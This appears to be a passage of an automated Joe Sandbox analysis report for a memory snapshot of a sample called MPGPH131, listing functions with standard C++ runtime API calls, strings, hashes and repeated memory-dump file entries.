                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                      • String ID: bad locale name
                                      • API String ID: 3375549084-1405518554
                                      • Opcode ID: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
                                      • Instruction ID: 1c31f9b67f7353acd85aa191f0651b1bba2dfc16eb672bb90e8a8894736f2356
                                      • Opcode Fuzzy Hash: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
                                      • Instruction Fuzzy Hash: A4616DB1D01248ABEF11DFA4D885BDEBBF4AF15310F5440A9E804AB351EB74E945CB92
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3835
                                      • __Getctype.LIBCPMT ref: 00AB384E
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AB386A
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB38FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                      • String ID: bad locale name
                                      • API String ID: 1840309910-1405518554
                                      • Opcode ID: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
                                      • Instruction ID: 5a568cb7bf7b580ca51d0cbdf8568b1f8e2f7a44432782997672ef72e0d77e5c
                                      • Opcode Fuzzy Hash: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
                                      • Instruction Fuzzy Hash: 1B5130B2D002489BEF10DFE4D845BDEFBF8AF14710F144169E815AB342E775AA45CB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FB67
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00B8FB6F
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FBF8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00B8FC23
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FC78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
                                      • Instruction ID: 97d3bd18c6fa46e2b6ccbb7ea36dc0064968b37612fa2f3397dd5299d65e515c
                                      • Opcode Fuzzy Hash: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
                                      • Instruction Fuzzy Hash: 76418630A002099BCF10FF68C895AAEBBF5EF45324F1481E5EC149B3A2D771EA55CB91
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B18903
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B18926
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B18946
                                      • std::_Facet_Register.LIBCPMT ref: 00B189BB
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B189D3
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B189EB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                      • String ID:
                                      • API String ID: 2081738530-0
                                      • Opcode ID: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
                                      • Instruction ID: 9fef14cf03083a510d955d48e3857d8c0d7c5daea8cab51a04fc35088b44c229
                                      • Opcode Fuzzy Hash: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
                                      • Instruction Fuzzy Hash: 2A41E271900259DFCF10DF54D881AAEBBF5FB05360F5442AAE915AB361DB30AE80CBD2
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB60F2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB617F
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB6248
                                      Strings
                                      • recursive_directory_iterator::operator++, xrefs: 00AB61CC
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy$___std_exception_copy
                                      • String ID: recursive_directory_iterator::operator++
                                      • API String ID: 1206660477-953255998
                                      • Opcode ID: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
                                      • Instruction ID: ccefc026624453d60dbb2275f385abe3c79396f4e2f129c8c863f68e62bd4c88
                                      • Opcode Fuzzy Hash: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
                                      • Instruction Fuzzy Hash: 3BE1F0B19006049FDB28DF68D845BAEFBF9FF44300F14866DE41693792D774AA44CBA1
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB86DE
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB86ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: at line $, column
                                      • API String ID: 4194217158-191570568
                                      • Opcode ID: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
                                      • Instruction ID: cacc5ba0a5a996d98431dee7878d5519754ae1be669a52d33cb86c71b668c157
                                      • Opcode Fuzzy Hash: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
                                      • Instruction Fuzzy Hash: EB610671A002049FDB08DF6CCC85BEDBBB9EF44300F148658E415A7792EB78AA80CB95
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22BD6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22BEF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22D27
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22D40
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22EA6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22EBF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B23709
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B23722
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
                                      • Instruction ID: ffac10b0a24f827730619cdf657bc7d0e1569dda3e1166fafd3e2a65356f412f
                                      • Opcode Fuzzy Hash: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
                                      • Instruction Fuzzy Hash: F351B2B0C00258DBDF14EFA4DC85BDEBBF5AF05304F148299E449A7392D7786A89CB61
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1866435925
                                      • Opcode ID: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
                                      • Instruction ID: 0739dccd9c3407a504e68a4cf16a71caf3cdd6af09a9a34b08cde7136e8c99d6
                                      • Opcode Fuzzy Hash: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
                                      • Instruction Fuzzy Hash: 1D11A1B39107056BCB10DF59C805FEAB7ECEB15310F0485AAFA589B242EBB0E954CB91
                                      Strings
                                      • unordered_map/set too long, xrefs: 00B221D3
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: unordered_map/set too long
                                      • API String ID: 0-306623848
                                      • Opcode ID: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
                                      • Instruction ID: bbb1e9ca95b4e0184069a13de1e76b94658dc4bb51ab48955b7e6b84f93918e1
                                      • Opcode Fuzzy Hash: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
                                      • Instruction Fuzzy Hash: BAE1DF71A002159FCB18DF6CD980AA9B7F5FF58310B1487AAE819EB395E730E951CB90
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB844D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: parse error$ror
                                      • API String ID: 2659868963-4201802366
                                      • Opcode ID: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
                                      • Instruction ID: d43c678ab274cd5761bc621903ce1687b7dd8f9cdfc7598ea336ea5eddfe6553
                                      • Opcode Fuzzy Hash: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
                                      • Instruction Fuzzy Hash: 11C1E671D10649CFEB08CF68CC85BEDBBB9BF55304F148298E4046B692DB78AAC5CB51
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB8051
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB8060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: [json.exception.
                                      • API String ID: 4194217158-791563284
                                      • Opcode ID: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
                                      • Instruction ID: 8630a06e8e2aee912fb94001f68de88b748274701d2cecdcd5d6f867610bb145
                                      • Opcode Fuzzy Hash: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
                                      • Instruction Fuzzy Hash: 9A91F8719002489FDB18DFA8CC85BEEFBB5FF55310F14425DE410AB6A2D7B4AA84C791
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
